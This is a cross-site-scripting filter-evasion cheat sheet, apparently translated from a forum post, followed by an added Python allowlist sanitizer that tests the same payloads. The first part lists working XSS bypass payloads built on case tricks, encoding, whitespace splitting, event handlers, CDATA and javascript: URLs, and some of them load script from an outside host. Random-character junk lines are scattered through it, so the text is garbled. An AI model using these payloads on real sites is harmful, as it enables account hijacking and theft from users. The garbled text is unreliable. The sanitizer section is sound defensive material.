1. Change the letter case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

4 N6 v) l$ h0 |7 Y
3. Replace the .js extension with another extension

<script src="bad.jpg"></script>

% H2 I& g( S* O& ~& V# C0 {" |
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");');
}

|: F# e1 o2 A% ^* }% g
5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>

% L4 d; Y. ~: x% F
6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> newline

(the gaps inside "javascript" above are tab or newline characters, which the browser removes before it parses the URL)

9 L, {& U8 W" r6 A
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

7 t. |* F% c8 v4 [8 X1 E" Q4 _* B$ v" N+ W8 [' w$ ?
11. Use CDATA to split the XSS code so that it is reassembled afterwards

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

; W& {: `4 A6 J `8 l9 p. J0 H4 O E* _8 R; S) } H
12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

8 j( [/ [3 i& {2 v- ]6 |
13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
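Every technique in this list defeats the same kind of defence: a literal pattern match on the raw input. As an added, defender-side example that is not part of the original post, the Python below puts such a naive blocklist regex next to an allowlisting sanitizer built on the standard library's html.parser, and runs both over the page's own payloads from sections 1, 5, 6, 7, 9 and 14, plus two constructed variants (an entity-encoded tab, for section 8, and a mixed-case scheme inside an href, for sections 1 and 14). The tag and attribute allowlist, the is_safe_url normalisation rules, and the sample inputs are assumptions made for this example, not anything the original post specifies.

```python
import html
import re
from html.parser import HTMLParser

# --- The kind of check the payloads above are written to defeat ---
# A literal, case-sensitive blocklist: it only matches these exact spellings,
# so "<sCript", "jav<TAB>ascript:" and "JavaScript:" all slip past it.
NAIVE_BLOCKLIST = re.compile(r"<script|javascript:")


def naive_filter_catches(fragment: str) -> bool:
    """Return True when the naive blocklist would reject the fragment."""
    return NAIVE_BLOCKLIST.search(fragment) is not None


# --- Allowlist sanitizer (tag/attribute sets are assumptions for this example) ---
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "img", "br", "span", "div"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}
RAW_TEXT_TAGS = {"script", "style"}     # their bodies are discarded wholesale
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))
_SCHEME = re.compile(r"([a-zA-Z][a-zA-Z0-9+.\-]*):")


def is_safe_url(value: str) -> bool:
    """Normalise the URL the way a browser does, then allowlist its scheme.

    Browsers strip leading/trailing C0 controls and spaces and delete tab, LF
    and CR anywhere in a URL before parsing it.  A check that does not do the
    same compares "jav<TAB>ascript:" while the browser sees "javascript:".
    """
    value = value.strip(_C0_AND_SPACE)
    value = re.sub(r"[\t\n\r]", "", value)
    match = _SCHEME.match(value)
    if match is None:
        return True                      # relative URL: no scheme to abuse
    return match.group(1).lower() in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialise a fragment, keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []                    # emitted HTML pieces
        self.dropped = []                # (reason, detail) for logging/alerting
        self._raw_text_tag = None        # set while inside a dropped <script>/<style>

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already lower-cased the tag name, split "<SCRIPT/SRC=..."
        # into tag + attribute, and entity-decoded the attribute values, so the
        # case, "/" and hex-encoding tricks are gone before we look at anything.
        if tag in RAW_TEXT_TAGS:
            self._raw_text_tag = tag
        if tag not in ALLOWED_TAGS:
            self.dropped.append(("tag", tag))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(("attr", f"{tag}@{name}"))   # onload=, style=, ...
                continue
            if name in URL_ATTRS and not is_safe_url(value):
                self.dropped.append(("url", value))
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self._raw_text_tag:
            self._raw_text_tag = None
        elif tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._raw_text_tag is None:   # script/style bodies are not re-emitted
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment: str):
    """Return (clean_html, dropped) for an untrusted HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed inputs: the page's own payloads plus two labelled variants.
SAMPLES = [
    "<sCript>alert('d')</scRipT>",                                 # 1: letter case
    '<SCRIPT/SRC="t.js"></SCRIPT>',                                # 5: "/" inside the tag
    "<img src=\"jav\tascr\nipt:alert('XSS3')\">",                 # 6: tab and newline
    "<img src=\"jav&#x09;ascript:alert('XSS')\">",                # 8 (constructed): hex entity
    "<body onload=\"alert('onload')\">",                           # 9: event handler
    "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",     # 7: style attribute
    "<a href=\"JavaScript:alert('XSS')\">x</a>",                   # 1+14 (constructed): href scheme
    '<a href="https://example.com/">ok</a>',                       # benign: must survive
]

if __name__ == "__main__":
    for sample in SAMPLES:
        clean, dropped = sanitize(sample)
        print(f"naive={naive_filter_catches(sample)!s:5} clean={clean!r} dropped={dropped}")
```

Running it shows the naive regex returning False for every payload while the sanitizer reduces each one to an empty string, a bare `<img>`/`<div>`, or `<a>x</a>`, and leaves the benign link intact. The two design choices that matter are visible in the code: decisions are made on the parsed, decoded tag and attribute names rather than on the raw bytes, and URLs are normalised before the scheme is compared, so the evasions in sections 1, 2, 5, 6 and 8 have nothing left to exploit. Everything not explicitly allowlisted (style attributes, event handlers, and the XML, EMBED, META and HTML+TIME elements of sections 7 and 10 to 13) is dropped without needing a rule per vector. The `dropped` list is what a defender would feed into logging or alerting, since a request carrying a `javascript:` URL or an `on*` attribute is a strong signal on its own. For production use, prefer a maintained sanitizer library over a hand-rolled one; the point of the example is the model, not the code.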